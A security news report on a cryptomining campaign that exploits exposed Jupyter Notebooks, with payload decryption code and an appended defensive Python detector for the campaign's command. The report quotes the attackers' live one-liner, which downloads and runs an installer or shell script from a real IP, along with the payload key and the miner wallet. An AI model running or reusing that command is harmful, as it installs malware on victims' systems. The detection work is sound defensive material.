Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer

A novel cryptomining campaign has been identified that exploits misconfigured Jupyter Notebooks, targeting both Windows and Linux systems. The attack leverages exposed instances of Jupyter Notebook, an interactive application widely used by data scientists that includes a Python IDE, to deploy malicious code that installs cryptomining software on compromised systems.

The campaign begins by exploiting unsecured Jupyter environments to execute a command that attempts to install malware through multiple methods. The initial payload attempts to download either an MSI file for Windows systems or a JavaScript file for Linux environments using the command:

`(ipconfig && msiexec /i http://45.130.22.219/py0217.msi) || (wget -q -O- http://45.130.22.219/py0217.js|sh)`

Analysts at Cado Security Labs [identified](https://www.cadosecurity.com/blog/jupyter-notebooks-cryptominer) this attack through their honeypot systems, noting that the campaign represents a new vector for cryptomining attacks that has not been previously reported, despite sharing similarities with earlier campaigns targeting Ivanti Connect Secure and Korean web servers.

When targeting Windows systems, the attack downloads an MSI installer containing a 64-bit Windows executable named 'Binary.freedllbinary'. This binary loads a secondary payload called 'java.exe', which is stored in C:\ProgramData.
Despite its name, 'java.exe' is actually a malicious binary packed with UPX that retrieves an encrypted blob called 'x2.dat' from various repositories including GitHub, Launchpad, and Gitee.

**Attack Chain**

The attackers employ sophisticated [encryption](https://cybersecuritynews.com/windows-11-bitlocker-encryption-bypassed/) techniques to hide their payloads. The 'x2.dat' file is encrypted with ChaCha20 using the nonce 'aQFabieiNxCjk6ygb1X61HpjGfSKq4zH' and the key 'AZIzJi2WxU0G' before being compressed with zlib. The code to decrypt this payload is as follows:

```python
from Crypto.Cipher import ChaCha20  # PyCryptodome
import zlib

# Values quoted above. PyCryptodome's ChaCha20 takes a 32-byte key and an
# 8-, 12- or 24-byte nonce, so the 32-character value is passed as the key
# and the 12-character value as the nonce.
key = b"aQFabieiNxCjk6ygb1X61HpjGfSKq4zH"
nonce = b"AZIzJi2WxU0G"

with open("x2.dat", "rb") as f:  # the downloaded blob
    ciphertext = f.read()

cipher = ChaCha20.new(key=key, nonce=nonce)
plaintext = cipher.decrypt(ciphertext)

# Decompress with zlib after decryption
decompressed_data = zlib.decompress(plaintext)
```

For Linux systems, the attack downloads a bash script '0217.js' that retrieves two ELF binaries and sets up cronjobs to ensure persistence.

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOwYCX5PxgXIHAJhjz5l99awWrT4enm3VFNrm0apnT3EOPk2aprHMgLLS4s3j5ryMp191KLZtASnwjkrTGlOBe5pUbf__jtetH9kNUeg8NsyKBNgem3cGA0mDtvbwRyV9QH1mtQGSdoOD2kD0VPMtjpf2_Jad7UsYZoQxAUqHp4QDGst0T1hh7Bhf3e4Y/s16000/Mining%20pool%20(Source%20-%20CRADO%20Security).webp)

Mining pool (Source: Cado Security)

The malware targets [cryptocurrencies](https://cybersecuritynews.com/how-cryptocurrencies-are-combatting-cyber-breaches/) including Monero, Sumokoin, ArQma, and several others, using wallet ID '44Q4cH4jHoAZgyHiYBTU9D7rLsdV82y4EvPRkjgdMQThPLJVB3ZbD9Sc1i84Q9eHYgb9Ze7A3syWV'. Organizations should implement strong authentication, disable public access to Jupyter instances, and regularly monitor cloud environments for unusual activity to [mitigate](https://cybersecuritynews.com/ways-to-mitigate-phishing-attacks-a-detailed-guide/) these attacks.

The post [Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer](https://cybersecuritynews.com/hackers-attacking-exposed-jupyter-notebooks/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
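As an added defensive example (not Cado's or the article's code), the following Python flags command strings, such as crontab entries or process-creation audit events, that share the two traits of the campaign's one-liner: msiexec installing an MSI straight from a URL, and a download piped directly into a shell. The IOC host is the delivery server quoted in the article; the sample lines are constructed and the regexes are assumptions to be tuned for your environment.

```python
import re
from dataclasses import dataclass, field

# Delivery host quoted in the article; extend with your own indicator feed.
IOC_HOSTS = {"45.130.22.219"}

# msiexec installing an MSI straight from a URL, e.g. "msiexec /i http://host/x.msi"
MSIEXEC_REMOTE = re.compile(r"msiexec(?:\.exe)?\s+/i\s+https?://", re.I)
# A download written to stdout and piped into a shell, e.g. "wget -q -O- URL | sh"
PIPE_TO_SHELL = re.compile(
    r"(?:wget\s+[^|]*-O-?\s*[^|]*|curl\s+[^|]*)\|\s*(?:ba|da|z)?sh\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.I)

@dataclass
class Finding:
    command: str
    reasons: list = field(default_factory=list)

def inspect_command(cmd: str) -> Finding:
    """Return why a single command string resembles the campaign's one-liner."""
    finding = Finding(cmd)
    if MSIEXEC_REMOTE.search(cmd):
        finding.reasons.append("msiexec installing an MSI from a URL")
    if PIPE_TO_SHELL.search(cmd):
        finding.reasons.append("download piped directly into a shell")
    # Deduplicate hosts so a URL repeated in one line yields a single reason.
    for host in sorted({h.split(":")[0] for h in URL_HOST.findall(cmd)}):
        if host in IOC_HOSTS:
            finding.reasons.append(f"contacts known IOC host {host}")
    return finding

def scan(lines):
    """Keep only the commands that triggered at least one reason."""
    return [f for f in (inspect_command(l.strip()) for l in lines) if f.reasons]

# Constructed sample input: two benign entries and the article's one-liner.
SAMPLE = [
    "*/5 * * * * /usr/bin/python3 /home/ds/jobs/refresh_cache.py",
    "wget -q -O /tmp/data.csv https://data.example.org/daily.csv",
    "(ipconfig && msiexec /i http://45.130.22.219/py0217.msi) || "
    "(wget -q -O- http://45.130.22.219/py0217.js|sh)",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit.command)
        for reason in hit.reasons:
            print("  -", reason)
```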
